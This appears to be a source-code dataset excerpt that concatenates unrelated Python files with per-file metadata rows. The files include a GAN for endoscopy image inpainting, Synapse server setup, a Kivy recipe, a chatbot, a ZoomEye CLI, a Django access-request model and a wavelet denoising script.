
    def set_training_info(self):
        self.info={}
        import sys
        try:
            if len(sys.argv)==1:
                choise=2
            else:
                choise=int(input("press 1 for last run or 2 for info.txt "))
        except:
            choise=False
        if choise==1:
            self.info=np.load("temp_info.npy").item()
            return
        elif choise==2:
            with open("info.txt") as f:
                for line in f:
                    (key, val) = line.split()
                    try:
                        self.info[key] = int(val)
                    except:
                        self.info[key] = float(val)
            np.save("temp_info.npy", self.info)
            return
        else:
            self.info["mask"]=int(input("Mask [1] or corner [0]? "))
            if self.info['mask']==1:
                tmp=input("Mask address? (default: /masks) ")
                self.info["mask_folder"]=tmp if isinstance(tmp, str) else "/masks"
            self.info["epochs"]=int(input("Number of epochs? "))
            self.info["batch_size"]=int(input("Batch size? "))
            self.info["save_interval"]=int(input("save interval? "))
            np.save("temp_info.npy", self.info)

    def train_model(self):
        def t(m,bol):
            for layer in m.layers:
                layer.trainable=bol
        if self.info==None:
            print("Warning no info found, prompting for info")
            self.set_training_info()
        globals().update(self.info)
        if self.combined==None:
            print("Error: no model loaded")
            return
        if self.pretrained==True:
            print("Warning: model has pretrained weights")

        half_batch = batch_size
        for epoch in tqdm(range(epochs)):
            X_train = plotload.load_polyp_batch(self.img_shape, batch_size, data_type='med/none',crop=False)
            if corner:
                masked_imgs, missing, mask = ms.mask_green_corner(X_train)
                m=np.zeros(shape=X_train.shape)
                for i in range(X_train.shape[0]):
                    m[i,mask[0]:mask[1],mask[2]:mask[3]]=missing[i]
                missing=m
            else:
                masked_imgs, missing, mask = ms.mask_from_template(X_train)

            if soft:
                valid = 0.2*np.random.random_sample((half_batch,1))+0.9
                fake = 0.1*np.random.random_sample((half_batch,1))
            else:
                valid = np.ones((half_batch, 1))
                fake = np.zeros((half_batch, 1))

            # ---------------------
            #  Train Generator
            # ---------------------
            valid = np.ones((batch_size, 1))
            # Train the generator
            t(self.discriminator,False)
            g_loss = self.combined.train_on_batch(masked_imgs, [X_train, valid])
            t(self.discriminator,True)

            # ---------------------
            #  Train discriminator
            # ---------------------
            gen_fake = self.generator.predict(masked_imgs)
            gen_fake = ms.combine_imgs_with_mask(gen_fake, X_train, mask)

            if epoch%120==0 and epoch!=0:
                # small shakeup to get out of local minima
                fake, valid = valid, fake

            # Train the discriminator
            d_loss_real = self.discriminator.train_on_batch(X_train, valid)
            d_loss_fake = self.discriminator.train_on_batch(gen_fake, fake)
            d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)

            # Plot the progress
            print ("[D: %f G: %f, mse: %f]" % (d_loss[0], g_loss[0], g_loss[1]))

            if g_loss[1]<self.threshold:
                self.threshold=g_loss[1]
                self.generator.save(f"models/CCgan-gen-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
                self.discriminator.save(f"models/CCgan-dic-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
                self.combined.save(f"models/CCgan-com-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}.h5")
                self.combined.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-com.h5")
                self.discriminator.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-dis.h5")
                self.generator.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-gen.h5")

        if g_loss[1]<self.threshold:
            self.threshold=g_loss[1]
            self.generator.save(f"models/CCgan-gen-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}_fin.h5")
            self.discriminator.save(f"models/CCgan-dic-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}_fin.h5")
            self.combined.save(f"models/CCgan-com-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}_fin.h5")
            self.combined.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-com_fin.h5")
            self.discriminator.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-dis_fin.h5")
            self.generator.save_weights(f"models/CCgan-{self.img_shape[0]}-{self.img_shape[1]}-{'c' if corner else 'n'}-w-gen_fin.h5")

    def build_wrapper(self):
        """
        Returns a func that works as a complete preprocess tool
        """
        if mask==1:
            def ret(input_img,mask=None):
                """
                Without a corner, a mask must be added
                """
                if not cutter.is_green(input_img):
                    return input_img
                if mask is None:
                    mask=plotload.load_single_template(input_img.shape,dest='med/green')
                img=input_img.copy()
                if len(img.shape)==3:
                    img=np.expand_dims(img, 0)
                prediced=np.squeeze(self.generator.predict(img),0)
                img=masker.combine_imgs_with_mask(prediced, img, mask)
                return np.expand_dims(img,0)
        else:
            def ret(input_img):
                if not cutter.is_green(input_img):
                    return input_img
                img=input_img.copy()
                if len(img.shape)==3:
                    img=np.expand_dims(img, 0)
                y1,y2,x1,x2=self.dims
                img, _, _ = ms.mask_green_corner(img)
                prediced=np.squeeze(self.generator.predict(img),0)
                img=np.squeeze(img,0)
                img[y1:y2,x1:x2]=prediced[y1:y2,x1:x2]
                return np.expand_dims(img,0)
        return ret
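
    # Illustrative use of the returned wrapper (not part of the original
    # class): images are expected scaled to [-1, 1], as in sort_folder below,
    # and the wrapper returns a one-image batch:
    #
    #     w = cc.build_wrapper()
    #     cleaned = w(img)  # shape (1, img_cols, img_rows, channels)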
    def sample_images(self, epoch, imgs):
        r, c = 3, 6
        # qualified via the "masker as ms" alias imported above; the direct
        # imports are commented out at the top of the file
        masked_imgs, missing_parts, m = ms.mask_from_template(imgs)
        gen_fake1 = self.generator.predict(missing_parts)
        gen_fake = ms.combine_imgs_with_mask(gen_fake1, imgs, m)

        imgs = 0.5 * imgs + 0.5
        masked_imgs = 0.5 * masked_imgs + 0.5
        gen_fake = 0.5 * gen_fake + 0.5
        gen_fake1 = 0.5 * gen_fake1 + 0.5

        fig, axs = plt.subplots(r, c)
        for i in range(c):
            axs[0,i].imshow(imgs[i, :,:])
            axs[0,i].axis('off')
            axs[1,i].imshow(gen_fake[i, :,:])
            axs[1,i].axis('off')
            axs[2,i].imshow(gen_fake1[i,:,:])
            axs[2,i].axis('off')
        fig.savefig("images/cc_%d.png" % epoch)
        plt.close()

    def sort_folder(self,w,path=None):
        import os
        import cv2
        from tqdm import tqdm
        from shutil import copyfile
        import sys
        if path is not None:
            dirs_i=[]
            dirs_o=[]
            d=next(os.walk(path))[1]
            for i in d:
                if i =='none' or i=='green' or i=='preprocessed':
                    continue
                dirs_o.append(path+'preprocessed/'+i)
                dirs_i.append(path+i)
            for i in dirs_o:
                if not os.path.exists(i):
                    os.makedirs(i)
        else:
            polyps='polyps'
            ulcerative_colitis='ulcerative-colitis'
            dirs=[polyps,ulcerative_colitis]
            if not os.path.exists(polyps_prep):
                os.makedirs(polyps_prep)
            if not os.path.exists(ulcerative_colitis_prep):
                os.makedirs(ulcerative_colitis_prep)
        for i,o in tqdm(zip(dirs_i,dirs_o)):
            for img_name in os.listdir(i):
                path=os.path.join(i,img_name)
                img=plotload.load_one_img((self.img_cols,self.img_rows), dest=path,
                                          extra_dim=True)
                if cutter.is_green(img):
                    tmp=cv2.imwrite(os.path.join(o,img_name), cv2.cvtColor(127.5*w(img)[0]+127.5,cv2.COLOR_RGB2BGR))
                else:
                    tmp=cv2.imwrite(os.path.join(o,img_name), cv2.cvtColor(127.5*img[0]+127.5,cv2.COLOR_RGB2BGR))


if __name__ == '__main__':
    cc = CCgan(256,256)
    #cc.build_model()
    #cc.train_model()
    cc.load_model()
    #cc.load_model_weights()
    w=cc.build_wrapper()
    root='/home/mathias/Documents/kvasir-dataset-v2/med/'
    cc.sort_folder(w,path=root)
    cc.sort_folder(w,path='/media/mathias/A_New_Hope/medico_test/')
| 41.199346 | 142 | 0.546601 | 11,759 | 0.932736 | 0 | 0 | 0 | 0 | 0 | 0 | 3,307 | 0.262315 |
cdea49e6abeeb4e6ceb631ab1583ede7c457b5ed | 6,585 | py | Python | synapse/server.py | uroborus/synapse | 270825ab2a3e16bb8ffcdbcea058efd28a38e8e1 | ["Apache-2.0"] | 1 | 2021-09-09T08:50:20.000Z | 2021-09-09T08:50:20.000Z | synapse/server.py | uroborus/synapse | 270825ab2a3e16bb8ffcdbcea058efd28a38e8e1 | ["Apache-2.0"] | null | null | null | synapse/server.py | uroborus/synapse | 270825ab2a3e16bb8ffcdbcea058efd28a38e8e1 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2014 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# This file provides some classes for setting up (partially-populated)
# homeservers; either as a full homeserver as a real application, or a small
# partial one for unit test mocking.

# Imports required for the default HomeServer() implementation
from synapse.federation import initialize_http_replication
from synapse.api.events import serialize_event
from synapse.api.events.factory import EventFactory
from synapse.notifier import Notifier
from synapse.api.auth import Auth
from synapse.handlers import Handlers
from synapse.rest import RestServletFactory
from synapse.state import StateHandler
from synapse.storage import DataStore
from synapse.types import UserID, RoomAlias, RoomID
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.lockutils import LockManager
from synapse.streams.events import EventSources
from synapse.api.ratelimiting import Ratelimiter


class BaseHomeServer(object):
    """A basic homeserver object without lazy component builders.

    This will need all of the components it requires to either be passed as
    constructor arguments, or the relevant methods overriding to create them.
    Typically this would only be used for unit tests.

    For every dependency in the DEPENDENCIES list below, this class creates one
    method,
        def get_DEPENDENCY(self)
    which returns the value of that dependency. If no value has yet been set
    nor was provided to the constructor, it will attempt to call a lazy builder
    method called
        def build_DEPENDENCY(self)
    which must be implemented by the subclass. This code may call any of the
    required "get" methods on the instance to obtain the sub-dependencies that
    one requires.
    """

    DEPENDENCIES = [
        'clock',
        'http_client',
        'db_name',
        'db_pool',
        'persistence_service',
        'replication_layer',
        'datastore',
        'event_factory',
        'handlers',
        'auth',
        'rest_servlet_factory',
        'state_handler',
        'room_lock_manager',
        'notifier',
        'distributor',
        'resource_for_client',
        'resource_for_federation',
        'resource_for_web_client',
        'resource_for_content_repo',
        'event_sources',
        'ratelimiter',
    ]

    def __init__(self, hostname, **kwargs):
        """
        Args:
            hostname : The hostname for the server.
        """
        self.hostname = hostname
        self._building = {}

        # Other kwargs are explicit dependencies
        for depname in kwargs:
            setattr(self, depname, kwargs[depname])

    @classmethod
    def _make_dependency_method(cls, depname):
        def _get(self):
            if hasattr(self, depname):
                return getattr(self, depname)

            if hasattr(self, "build_%s" % (depname)):
                # Prevent cyclic dependencies from deadlocking
                if depname in self._building:
                    raise ValueError("Cyclic dependency while building %s" % (
                        depname,
                    ))
                self._building[depname] = 1

                builder = getattr(self, "build_%s" % (depname))
                dep = builder()
                setattr(self, depname, dep)

                del self._building[depname]

                return dep

            raise NotImplementedError(
                "%s has no %s nor a builder for it" % (
                    type(self).__name__, depname,
                )
            )

        setattr(BaseHomeServer, "get_%s" % (depname), _get)

    # TODO: Why are these parse_ methods so high up along with other globals?
    # Surely these should be in a util package or in the api package?

    # Other utility methods
    def parse_userid(self, s):
        """Parse the string given by 's' as a User ID and return a UserID
        object."""
        return UserID.from_string(s, hs=self)

    def parse_roomalias(self, s):
        """Parse the string given by 's' as a Room Alias and return a RoomAlias
        object."""
        return RoomAlias.from_string(s, hs=self)

    def parse_roomid(self, s):
        """Parse the string given by 's' as a Room ID and return a RoomID
        object."""
        return RoomID.from_string(s, hs=self)

    def serialize_event(self, e):
        return serialize_event(self, e)

# Build magic accessors for every dependency
for depname in BaseHomeServer.DEPENDENCIES:
    BaseHomeServer._make_dependency_method(depname)
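
# Illustrative effect of the loop above (not part of the original module):
# since 'clock' is listed in DEPENDENCIES, BaseHomeServer gains a get_clock()
# method; calling hs.get_clock() on a HomeServer then invokes build_clock()
# once and caches the result as hs.clock for subsequent calls.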
class HomeServer(BaseHomeServer):
    """A homeserver object that will construct most of its dependencies as
    required.

    It still requires the following to be specified by the caller:
        resource_for_client
        resource_for_web_client
        resource_for_federation
        resource_for_content_repo
        http_client
        db_pool
    """

    def build_clock(self):
        return Clock()

    def build_replication_layer(self):
        return initialize_http_replication(self)

    def build_datastore(self):
        return DataStore(self)

    def build_event_factory(self):
        return EventFactory(self)

    def build_handlers(self):
        return Handlers(self)

    def build_notifier(self):
        return Notifier(self)

    def build_auth(self):
        return Auth(self)

    def build_rest_servlet_factory(self):
        return RestServletFactory(self)

    def build_state_handler(self):
        return StateHandler(self)

    def build_room_lock_manager(self):
        return LockManager()

    def build_distributor(self):
        return Distributor()

    def build_event_sources(self):
        return EventSources(self)

    def build_ratelimiter(self):
        return Ratelimiter()

    def register_servlets(self):
        """ Register all servlets associated with this HomeServer.
        """
        # Simply building the ServletFactory is sufficient to have it register
        self.get_rest_servlet_factory()
| 31.658654 | 79 | 0.665907 | 4,919 | 0.747001 | 0 | 0 | 964 | 0.146393 | 0 | 0 | 3,137 | 0.476386 |
cdea57f865285710bac46af78cc530224ae5efeb | 359 | py | Python | pythonforandroid/recipes/kivy/__init__.py | inclement/p4a-experiment | 4e120e08cc3c33af89948307628c8b28fdf76b87 | ["MIT"] | 1 | 2015-06-09T21:12:09.000Z | 2015-06-09T21:12:09.000Z | pythonforandroid/recipes/kivy/__init__.py | inclement/p4a-experiment | 4e120e08cc3c33af89948307628c8b28fdf76b87 | ["MIT"] | null | null | null | pythonforandroid/recipes/kivy/__init__.py | inclement/p4a-experiment | 4e120e08cc3c33af89948307628c8b28fdf76b87 | ["MIT"] | null | null | null |
from pythonforandroid.toolchain import CythonRecipe, shprint, current_directory, ArchAndroid
from os.path import exists, join
import sh
import glob


class KivyRecipe(CythonRecipe):
    version = 'stable'
    url = 'https://github.com/kivy/kivy/archive/{version}.zip'
    name = 'kivy'

    depends = ['pygame', 'pyjnius', 'android']


recipe = KivyRecipe()
| 21.117647 | 92 | 0.721448 | 183 | 0.509749 | 0 | 0 | 0 | 0 | 0 | 0 | 92 | 0.256267 |
cdeaa27ba25e454daf95595f163fae1a13887999 | 1,220 | py | Python | chat.py | Programmer-RD-AI/Learning-NLP-PyTorch | 5780598340308995c0b8436d3031aa58ee7b81da | ["Apache-2.0"] | null | null | null | chat.py | Programmer-RD-AI/Learning-NLP-PyTorch | 5780598340308995c0b8436d3031aa58ee7b81da | ["Apache-2.0"] | null | null | null | chat.py | Programmer-RD-AI/Learning-NLP-PyTorch | 5780598340308995c0b8436d3031aa58ee7b81da | ["Apache-2.0"] | null | null | null |
import random
import json

import torch

from model import NeuralNet
from nltk_utils import *

device = "cuda"

with open('intents.json','r') as f:
    intents = json.load(f)
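
# The loop below assumes intents.json has the usual shape for such chatbots
# (illustrative, inferred from the 'tag'/'responses' accesses further down):
#
#     {"intents": [{"tag": "greeting",
#                   "responses": ["Hey!", "Hello!"], ...}, ...]}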
FILE = 'data.pth'
data = torch.load(FILE)

input_size = data['input_size']
output_size = data['output_size']
hidden_size = data['hidden_size']
all_words = data['all_words']
tags = data['tags']
model_state = data['model_state']

model = NeuralNet(input_size, hidden_size, output_size).to(device)
model.load_state_dict(model_state)
model.eval()

bot_name = 'Programmer-RD-AI'
print('Lets chat ! type "quit" to exit')
while True:
    sentence = input('You : ')
    if sentence == 'quit':
        break
    sentence = tokenize(sentence)
    X = bag_of_words(sentence,all_words)
    X = X.reshape(1,X.shape[0])
    X = torch.from_numpy(X).to(device)
    pred = model(X)
    pred_ = pred.clone()
    _,pred = torch.max(pred,dim=1)
    tag = tags[pred.item()]
    probs = torch.softmax(pred_,dim=1)
    prob = probs[0][pred.item()]
    if prob.item() > 0.75:
        for intent in intents['intents']:
            if tag == intent['tag']:
                print(f'{bot_name}: {random.choice(intent["responses"])}')
    else:
        print(f'{bot_name}: IDK..')
| 29.047619 | 74 | 0.648361 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 251 | 0.205738 |
cdeb4f70b3a53f9cb3413cfdc25708394eec070f | 329 | py | Python | Jay_Redis/Jay_Redis/utils/GetProxyIp.py | kimsax/gratuation_project | 99f842753f3403d3fdcd62316cf6a8d0091a5871 | ["MIT"] | 1 | 2021-03-02T08:04:25.000Z | 2021-03-02T08:04:25.000Z | Jay_Redis/Jay_Redis/utils/GetProxyIp.py | kimsax/gratuation_project | 99f842753f3403d3fdcd62316cf6a8d0091a5871 | ["MIT"] | null | null | null | Jay_Redis/Jay_Redis/utils/GetProxyIp.py | kimsax/gratuation_project | 99f842753f3403d3fdcd62316cf6a8d0091a5871 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
import random
import redis
import requests


def GetIps():
    li = []
    # url = 'http://122.51.95.201:8000/?country=国内&count=20'
    url = 'http://127.0.0.1:8000/?country=国内&count=20'
    ips = requests.get(url)
    for ip in eval(ips.content):
        li.append(ip[0]+':'+str(ip[1]))
    return li

# GetIps()
| 20.5625 | 60 | 0.580547 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 136 | 0.403561 |
cdeb9ce72d1bf949c4fdc2a94b43168b90c61e61 | 876 | py | Python | setup.py | tbz-pariv/ftpservercontext | 426e98dd4983cc6977c4d071a831874726c0fae2 | ["Apache-2.0"] | 2 | 2019-04-18T12:28:58.000Z | 2021-01-04T14:52:07.000Z | setup.py | tbz-pariv/ftpservercontext | 426e98dd4983cc6977c4d071a831874726c0fae2 | ["Apache-2.0"] | 1 | 2019-01-04T14:46:00.000Z | 2019-06-04T12:31:45.000Z | setup.py | tbz-pariv/ftpservercontext | 426e98dd4983cc6977c4d071a831874726c0fae2 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
import setuptools

setuptools.setup(
    name='ftpservercontext',
    version='2018.3.0',
    license='commercial',
    author='Thomas Guettler',
    author_email='[email protected]',
    url='https://github.com/tbz-pariv/ftpservercontext',
    long_description=open('README.rst').read(),
    packages=setuptools.find_packages(),
    zip_safe = False,

    # https://www.tbz-pariv.lan/index.html/doku.php?id=python_packages#requirementstxt_vs_install_requires
    # All reusable libraries use install_requires.
    # Projects (containing only config) can use requirements.txt
    install_requires=[
        'pyftpdlib',
    ],
    include_package_data=True,
    entry_points={
        'console_scripts': [
            'serve_directory_via_ftp=ftpservercontext.console_scripts:serve_directory_via_ftp',
        ],
    }
)
| 29.2 | 106 | 0.696347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 504 | 0.575342 |
cdecd7c4bafe572b5e961bd73c1a75878f9feaa8 | 3,428 | py | Python | zoomeye/cli.py | r0oike/zoomeye-python | b93f1c9c350e4fce7580f9f71ab1e76d06ce165d | ["Apache-2.0"] | null | null | null | zoomeye/cli.py | r0oike/zoomeye-python | b93f1c9c350e4fce7580f9f71ab1e76d06ce165d | ["Apache-2.0"] | null | null | null | zoomeye/cli.py | r0oike/zoomeye-python | b93f1c9c350e4fce7580f9f71ab1e76d06ce165d | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
* Filename: cli.py
* Description: cli program entry
* Time: 2020.11.30
* Author: liuf5
"""

import os
import sys
import argparse

module_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.insert(1, module_path)

from zoomeye import core


class ZoomEyeParser(argparse.ArgumentParser):
    def error(self, message):
        self.print_help()
        sys.exit(2)


def main():
    """
    parse user input args
    :return:
    """
    parser = ZoomEyeParser()
    subparsers = parser.add_subparsers()

    # zoomeye account info
    parser_info = subparsers.add_parser("info", help="Show ZoomEye account info")
    parser_info.set_defaults(func=core.info)

    # query zoomeye data
    parser_search = subparsers.add_parser(
        "search",
        help="Search the ZoomEye database"
    )
    parser_search.add_argument(
        "dork",
        help="The ZoomEye search keyword or ZoomEye exported file"
    )
    parser_search.add_argument(
        "-num",
        default=20,
        help="The number of search results that should be returned",
        type=int,
        metavar='value'
    )
    parser_search.add_argument(
        "-facet",
        default=None,
        nargs='?',
        const='app,device,service,os,port,country,city',
        type=str,
        help=('''
              Perform statistics on the ZoomEye database,
              field: [app,device,service,os,port,country,city]
              '''),
        metavar='field'
    )
    parser_search.add_argument(
        "-filter",
        default=None,
        metavar='field=regexp',
        nargs='?',
        const='app',
        type=str,
        help=('''
              Output clearer search results by setting a filter field,
              field: [app,version,device,port,city,country,asn,banner,*]
              ''')
    )
    parser_search.add_argument(
        '-stat',
        default=None,
        metavar='field',
        nargs='?',
        const='app,device,service,os,port,country,city',
        type=str,
        help=('''
              Perform statistics on search results,
              field: [app,device,service,os,port,country,city]
              ''')
    )
    parser_search.add_argument(
        "-save",
        default=None,
        metavar='field=regexp',
        help=('''
              Save the search results in ZoomEye JSON format;
              if you specify the field, they will be saved as JSON Lines
              '''),
        nargs='?',
        type=str,
        const='all'
    )
    parser_search.add_argument(
        "-count",
        help="The total number of results in the ZoomEye database for a search",
        action="store_true"
    )
    parser_search.set_defaults(func=core.search)

    # initial account configuration related commands
    parser_init = subparsers.add_parser("init", help="Initialize the token for ZoomEye-python")
    parser_init.add_argument("-apikey", help="ZoomEye API Key", default=None, metavar='[api key]')
    parser_init.add_argument("-username", help="ZoomEye account username", default=None, metavar='[username]')
    parser_init.add_argument("-password", help="ZoomEye account password", default=None, metavar='[password]')
    parser_init.set_defaults(func=core.init)

    args = parser.parse_args()
    try:
        args.func(args)
    except AttributeError:
        parser.print_help()
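
# Example invocations built from the subcommands defined above (illustrative):
#
#     python cli.py init -apikey <your key>
#     python cli.py search "port:22" -num 5 -facet app
#     python cli.py info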
if __name__ == '__main__':
    main()
| 26.369231 | 110 | 0.606768 | 121 | 0.035298 | 0 | 0 | 0 | 0 | 0 | 0 | 1,497 | 0.436698 |
cdece39680fd28858374924d70a1d3ff5d97fb90 | 462 | py | Python | statapy/regression/tests.py | DhananjayAshok/PyStata | b592414d78b87d565d8c59ae9487478a792b8c84 | ["Apache-2.0"] | null | null | null | statapy/regression/tests.py | DhananjayAshok/PyStata | b592414d78b87d565d8c59ae9487478a792b8c84 | ["Apache-2.0"] | null | null | null | statapy/regression/tests.py | DhananjayAshok/PyStata | b592414d78b87d565d8c59ae9487478a792b8c84 | ["Apache-2.0"] | null | null | null |
import scipy.stats as stats
def mannwhitneyu(sample_0, sample_1, one_sided=False):
    """
    Performs the Mann-Whitney U test
    :param sample_0: array of values
    :param sample_1: array of values
    :param one_sided: True iff you want the one-sided "less than" alternative hypothesis
    :return: statistic, pvalue
    """
    res = stats.mannwhitneyu(sample_0, sample_1, alternative="two-sided" if not one_sided else "less")
    return res.statistic, res.pvalue
| 35.538462 | 102 | 0.722944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 250 | 0.541126 |
cdeceab8b898ec021afc4aa90ddeda2bd76d683c | 862 | py | Python | 3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py | RezaFirouzii/python-opencv-review | 454a2be7fa36516a2b1fbd4e6162068bba25c989 | ["MIT"] | null | null | null | 3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py | RezaFirouzii/python-opencv-review | 454a2be7fa36516a2b1fbd4e6162068bba25c989 | ["MIT"] | null | null | null | 3) Cartoonizing and Video Capture/#1 Accessing the webcam/webcam_access.py | RezaFirouzii/python-opencv-review | 454a2be7fa36516a2b1fbd4e6162068bba25c989 | ["MIT"] | null | null | null |
import cv2 as cv
if __name__ == "__main__":
# 0 => first (default) webcam connected,
# 1 => second webcam and so on.
cap = cv.VideoCapture(0, cv.CAP_DSHOW)
# cv.namedWindow("Window")
if not cap.isOpened():
raise IOError("Webcam could not be opened!")
while True:
res, frame = cap.read() # returns (bool, ndarray)
# in case any error occurs
if not res:
break
frame = cv.resize(frame, None, fx=.5, fy=.5)
cv.imshow("Video Stream", frame)
keyboardInput = cv.waitKey(1)
if keyboardInput == 27: # ESC button ascii code
break
cap.release()
cv.destroyAllWindows()
# you can also replace a normal video with webcam
# in video capture object, just give it the address of
# the video instead of 0 or number of your webcam
| 25.352941 | 61 | 0.597448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 376 | 0.436195 |
cdf16ad97ffce90e11c1fa4d69eb40752cd40a16 | 3,928 | py | Python | apps/sso/access_requests/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | ["BSD-3-Clause"] | 3 | 2021-05-16T17:06:57.000Z | 2021-05-28T17:14:05.000Z | apps/sso/access_requests/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | ["BSD-3-Clause"] | null | null | null | apps/sso/access_requests/models.py | g10f/sso | ba6eb712add388c69d4880f5620a2e4ce42d3fee | ["BSD-3-Clause"] | null | null | null |
import datetime
from current_user.models import CurrentUserField
from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.timezone import now
from django.utils.translation import gettext_lazy as _

from sso.accounts.models import Application
from sso.models import AbstractBaseModel, AbstractBaseModelManager
from sso.organisations.models import is_validation_period_active, Organisation


class AccessRequestManager(AbstractBaseModelManager):
    def open(self):
        return self.get(status='o')


class OpenAccessRequestManager(AbstractBaseModelManager):
    def get_queryset(self):
        return super().get_queryset().filter(status='o').prefetch_related('user__useremail_set')


class AccessRequest(AbstractBaseModel):
    STATUS_CHOICES = [
        ('o', _('open')),  # opened by user
        ('c', _('canceled')),  # by user
        ('v', _('approved')),
        ('d', _('denied'))
    ]
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    message = models.TextField(_("message"), max_length=2048,
                               help_text=_('Message for the administrators.'),
                               blank=True)
    comment = models.TextField(_("Comment"), max_length=2048, blank=True)
    status = models.CharField(_('status'), max_length=255, choices=STATUS_CHOICES, default='o')
    last_modified_by_user = CurrentUserField(verbose_name=_('last modified by'),
                                             related_name='accessrequest_last_modified_by',
                                             on_delete=models.SET_NULL)
    completed_by_user = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
                                          verbose_name=_('completed by'),
                                          related_name='accessrequest_completed_by', on_delete=models.SET_NULL)
    application = models.ForeignKey(Application, blank=True, null=True, on_delete=models.SET_NULL,
                                    verbose_name=_('application'))
    # required field if the user has no organisation
    organisation = models.ForeignKey(Organisation, blank=True, null=True, on_delete=models.CASCADE)

    objects = AccessRequestManager()
    open = OpenAccessRequestManager()

    def process(self, action=None, user=None):
        if action in ['cancel', 'verify', 'deny']:
            getattr(self, action)(user)
        else:
            raise ValueError

    def cancel(self, user):
        self.status = 'c'
        self.completed_by_user = user
        self.save()

    def verify(self, user):
        self.status = 'v'
        self.completed_by_user = user
        if self.organisation:
            self.user.set_organisations([self.organisation])

        # check if organisation uses user activation
        validation_period_active = False
        for organisation in self.user.organisations.all():
            if is_validation_period_active(organisation):
                self.user.valid_until = now() + datetime.timedelta(days=settings.SSO_VALIDATION_PERIOD_DAYS)
                self.user.save()
                validation_period_active = True
        if not validation_period_active:
            self.user.valid_until = None
            self.user.save()

        # add default member profile
        self.user.role_profiles.add(user.get_default_role_profile())
        self.user.role_profiles.remove(user.get_default_guest_profile())
        self.save()

    def deny(self, user):
        self.status = 'd'
        self.completed_by_user = user
        self.save()

    @property
    def is_open(self):
        return self.status == 'o'

    class Meta(AbstractBaseModel.Meta):
        verbose_name = _('access request')
        verbose_name_plural = _('access requests')

    def get_absolute_url(self):
        return reverse('accounts:accessrequest_detail', kwargs={'pk': self.pk})
| 39.28 | 111 | 0.649949 | 3,476 | 0.884929 | 0 | 0 | 66 | 0.016802 | 0 | 0 | 486 | 0.123727 |
cdf35f3aa036ddd5079307083d76c1f9e474653b | 1,518 | py | Python | test/snr_test.py | AP-Atul/wavelets | cff71e777759844b35f8e96f14930b2c71a215a1 | [
"MIT"
]
| 5 | 2021-02-01T07:43:39.000Z | 2022-03-25T05:01:31.000Z | test/snr_test.py | AP-Atul/wavelets | cff71e777759844b35f8e96f14930b2c71a215a1 | [
"MIT"
]
| null | null | null | test/snr_test.py | AP-Atul/wavelets | cff71e777759844b35f8e96f14930b2c71a215a1 | [
"MIT"
]
| null | null | null | import os
from time import time
import numpy as np
import soundfile
from matplotlib import pyplot as plt
from wavelet.fast_transform import FastWaveletTransform
from wavelet.util.utility import threshold, mad, snr, amp_to_db
INPUT_FILE = "/example/input/file.wav"
OUTPUT_DIR = "/example/output/"
info = soundfile.info(INPUT_FILE) # getting info of the audio
rate = info.samplerate
WAVELET_NAME = "coif1"
t = FastWaveletTransform(WAVELET_NAME)
outputFileName = os.path.join(OUTPUT_DIR, "_" + WAVELET_NAME + ".wav")
noiseRatios = list()
with soundfile.SoundFile(outputFileName, "w", samplerate=rate, channels=info.channels) as of:
start = time()
for block in soundfile.blocks(INPUT_FILE, int(rate * info.duration * 0.10)): # reading 10 % of duration
coefficients = t.waveDec(block)
# VISU Shrink
sigma = mad(coefficients)
thresh = sigma * np.sqrt(2 * np.log(len(block)))
# thresholding using the noise threshold generated
coefficients = threshold(coefficients, thresh)
# getting the clean signal as in original form and writing to the file
clean = t.waveRec(coefficients)
clean = np.asarray(clean)
of.write(clean)
noiseRatios.append(snr(amp_to_db(clean)))
end = time()
x = []
for i in range(len(noiseRatios)):
x.append(i)
plt.plot(x, np.array(noiseRatios).astype(float))
plt.show()
print(f"Finished processing with {WAVELET_NAME}")
print(f"Time taken :: {end - start} s")
| 29.192308 | 108 | 0.689065 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 322 | 0.212121 |
